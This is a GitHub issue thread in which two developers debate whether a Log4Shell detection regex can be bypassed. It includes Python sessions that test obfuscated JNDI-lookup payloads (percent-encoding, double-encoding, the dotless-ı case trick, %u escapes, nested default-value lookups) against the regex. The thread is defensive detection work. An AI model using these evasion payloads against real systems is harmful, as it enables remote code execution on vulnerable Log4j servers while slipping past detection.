Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Regex can be bypassed. #3

Closed
karanlyons opened this issue Dec 18, 2021 · 2 comments
Closed

Regex can be bypassed. #3

karanlyons opened this issue Dec 18, 2021 · 2 comments

Comments

@karanlyons
Copy link

karanlyons commented Dec 18, 2021

Compare against https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6

>>> import re
>>> from pprint import pprint

>>> BACK2ROOT_RE = re.compile(r'(?:\$|%(?:25)*24|\\(?:0024|0{0,2}44))(?:{|%(?:25)*7[Bb]|\\(?:007[Bb]|0{0,2}173)).{0,30}?((?:[Jj]|%(?:25)*[46][Aa]|\\(?:00[46][Aa]|0{0,2}1[15]2)).{0,30}?(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı).{0,30}?(?::|%(?:25)*3[Aa]|\\(?:003[Aa]|0{0,2}72)).{0,30}?((?:[Ll]|%(?:25)*[46][Cc]|\\(?:00[46][Cc]|0{0,2}1[15]4)).{0,30}?(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Aa]|%(?:25)*[46]1|\\(?:00[46]1|0{0,2}1[04]1)).{0,30}?(?:[Pp]|%(?:25)*[57]0|\\(?:00[57]0|0{0,2}1[26]0))(?:.{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3)))?|(?:[Rr]|%(?:25)*[57]2|\\(?:00[57]2|0{0,2}1[26]2)).{0,30}?(?:[Mm]|%(?:25)*[46][Dd]|\\(?:00[46][Dd]|0{0,2}1[15]5)).{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı)|(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3))|(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3))|(?:.{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı)){2}.{0,30}?(?:[Oo]|%(?:25)*[46][Ff]|\\(?:00[46][Ff]|0{0,2}1[15]7)).{0,30}?(?:[Pp]|%(?:25)*[57]0|\\(?:00[57]0|0{0,2}1[26]0))|(?:[Cc]|%(?:25)*[46]3|\\(?:00[46]3|0{0,2}1[04]3)).{0,30}?(?:[Oo]|%(?:25)*[46][Ff]|\\(?:00[46][Ff]|0{0,2}1[15]7)).{0,30}?(?:[Rr]|%(?:25)*[57]2|\\(?:00[57]2|0{0,2}1[26]2)).{0,30}?(?:[Bb]|%(?:25)*[46]2|\\(?:00[46]2|0{0,2}1[04]2)).{0,30}?(?:[Aa]|%(?:25)*[46]1|\\(?:00[46]1|0{0,2}1[04]1))|(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3))|(?:[Hh]|%(?:25)*[46]8|\\(?:00[46]8|0{0,2}1[15]0))(?:.{0,30}?(?:[Tt]|%(?:25)*[57]4|\\(?:00[57]4|0{0,2}1[26]4))){2}.{0,30}?(?:[Pp]|%(?:25)*[57]0|\\(?:00[57]0|0{0,2}1[26]0))(?:.{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3)))?).{0,30}?(?::|%(?:25)*3[Aa]|\\(?:003[Aa]|0{0,2}72)).{0,30}?(?:\/|%(?:25)*2[Ff]|\\(?:002[Ff]|0{0,2}57)|\${)|(?:[Bb]|%(?:25)*[46]2|\\(?:00[46]2|0{0,2}1[04]2)).{0,30}?(?:[Aa]|%(?:25)*[46]1|\\(?:00[46]1|0{0,2}1[04]1)).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3)).{0,30}?(?:[Ee]|%(?:25)*[46]5|\\(?:00[46]5|0{0,2}1[04]5)).{2,60}?(?::|%(?:25)*3[Aa]|\\(?:003[Aa]|0{0,2}72))(JH[s-v]|[\x2b\x2f-9A-Za-z][CSiy]R7|[\x2b\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\x2b\x2f-9w-z]))')

>>> esc_p = lambda s: "".join("%%%s" % hex(ord(c))[2:] if ord(c) < 256 else c for c in s)

>>> s1 = esc_p('${jnd${upper:ı}:ldap://')
>>> s1
'%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3aı%7d%3a%6c%64%61%70%3a%2f%2f'

>>> s2 = esc_p(esc_p('${jndi:ldap://addr}'))
>>> s2
'%25%32%34%25%37%62%25%36%61%25%36%65%25%36%34%25%36%39%25%33%61%25%36%63%25%36%34%25%36%31%25%37%30%25%33%61%25%32%66%25%32%66%25%36%31%25%36%34%25%36%34%25%37%32%25%37%64'

>>> BACK2ROOT_RE.search(s1) or False
<re.Match object; span=(0, 64), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3%7d%3a%6c>

>>> BACK2ROOT_RE.search(s2) or False
False

>>> from log4shell_regexes import *

>>> pprint(test(s1))
{'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 67), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3%7d%3a%6c>,
 'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 43), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3%7d'>,
 'NESTED_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 67), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3%7d%3a%6c>}

>>> pprint(test_thorough(s2))
{'${jndi:ldap://addr}': {'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 19), match='${jndi:ldap://addr}'>,
                         'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 19), match='${jndi:ldap://addr}'>,
                         'ANY_OPT_RCURLY_RE': <re.Match object; span=(0, 19), match='${jndi:ldap://addr}'>,
                         'ANY_RE': <re.Match object; span=(0, 19), match='${jndi:ldap://addr}'>,
                         'SIMPLE_OPT_RCURLY_RE': <re.Match object; span=(0, 19), match='${jndi:ldap://addr}'>,
                         'SIMPLE_RE': <re.Match object; span=(0, 19), match='${jndi:ldap://addr}'>},
 '%24%7b%6a%6e%64%69%3a%6c%64%61%70%3a%2f%2f%61%64%64%72%7d': {'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 57), match='%24%7b%6a%6e%64%69%3a%6c%64%61%70%3a%2f%2f%61%64%>,
                                                               'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 57), match='%24%7b%6a%6e%64%69%3a%6c%64%61%70%3a%2f%2f%61%64%>}}

The ?:%(25)*24|%) idea is neat, and I even incorporated it briefly (along with (?:%(25)*5c|\\)) but it assumes you’ll only ever escape url unsafe characters, and a smart attacker of course is going to violate that assumption. It is better not to lull your defender into a false sense of security, and this is why I have test_thorough.

As well this regex does not detect unicode case mapping attacks, but the gist I’ve shared with you before does by avoiding the assumptions that result in the possible evasion entirely.

@back2root
Copy link
Owner

Hi

THX for the issue. I used it, among others, to incorporate a few optimizations into my RegEx. Following some comments on your suggestions:

s1 = esc_p('${jnd${upper:ı}:ldap://')
s1
'%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%131%7d%3a%6c%64%61%70%3a%2f%2f'

The esc_p function does not work properly. Especially the "ı" is encoded wrong by your function.
The old RegEx wasn't capable of handling "ı" in URL-Encoded form, upcomming version will.

it assumes you’ll only ever escape url unsafe characters

Already the old RegEx allowed for escaping of safe charactersin general, though it didn't handle double encoding of safe characters right.Upcomming version will.

It is better not to lull your defender into a false sense of security

It's not my intend to "lull" someone into something.
The goal is to have a RegEx that represents a reasonable compromise between detecting as many attack attempts as possible with an acceptable number of false positives.
The APT attacker will find a way around if necessary, but less elaborate attacks will leave the warning light on.

I'll put an comment into the readme, so everyone can understand.

@karanlyons
Copy link
Author

karanlyons commented Dec 20, 2021

The esc_p function does not work properly.

You’re right, in my haste I missed a conditional which I’ve fixed in the original message. It now shows both your regex and my collection as catching the first. One thing to be mindful of here though is that you’re headed down the path of handling all sorts of various encodings within the one regex. For example there was—for at least a brief while—a non-standard but not uncommon percent escaping for unicode: %uXXXX, largely—if I recall correctly—due to Javascript’s escape behavior (§15.1.2.4), which some web backends—for easier interoperability with javascript frontends—had opted to support:

>>> esc_pu = lambda s: "".join("%%%s" % hex(ord(c))[2:] if ord(c) < 256 else "%%u%s" % hex(ord(c))[2:].rjust(4, "0") for c in s)
>>> s3 = esc_pu('${jnd${upper:ı}:ldap://')
>>> s3
'%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%3a%6c%64%61%70%3a%2f%2f'

>>> BACK2ROOT_RE.search(s3) or False
False

>>> pprint(test(s3))
{'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 48), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d'>,
 'NESTED_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 72), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%>,
 'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 72), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%>}

If the goal is to be resistant to unwrapping attacks against a diverse range of stacks then you may as well want to make sure alterations like this don’t also result in false negatives. I’m unsure of where you could expect to see this encoding nowadays, though. Interestingly though neither my test nor my test_thorough functions are explicitly aware of this encoding, they both detect the vector as their methodology doesn’t rely on an assumption that this encoding would not exist.

Already the old RegEx allowed for escaping of safe charactersin general, though it didn't handle double encoding of safe characters right.Upcomming version will.

Neat! It is frankly difficult to tell what the regex can and can’t catch due to its complexity.

It's not my intend to "lull" someone into something.

I do not think it is your intent, but I think it is a possible outcome. One of the hardest parts about being on a blue team is that by definition you get popped when you missed something, and so it is crucial to have 100% understanding of what it is you can and cannot catch. Grabbing a “comprehensive” regex like this where it is unlikely that that use will come with an understanding of its assumptions and limitations can turn out dangerously. Encoding assumptions into your detections will always open up surreptitious paths in violating those assumptions.

As another example:

>>> s4 = '${env:ZILCH:-jnd${lower:${upper:ı}}://addr'

>>> BACK2ROOT_RE.search(s4) or False
False

>>> pprint(test(s4))
{'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
 'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>,
 'ANY_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
 'ANY_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>,
 'NESTED_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
 'NESTED_INCL_ESCS_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>,
 'NESTED_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
 'NESTED_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>}

I can’t easily tell you why your regex isn’t catching this one due to its overall complexity (my best guess is that it doesn’t handle defaults and/or some forms of potential nested evaluation), and I’m actually surprised it doesn’t as I’d assume that it would. This is that danger that I’m speaking of: if I were running your detection and relying on it I would likely assume that this would be caught and thus never notice that it wasn’t.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants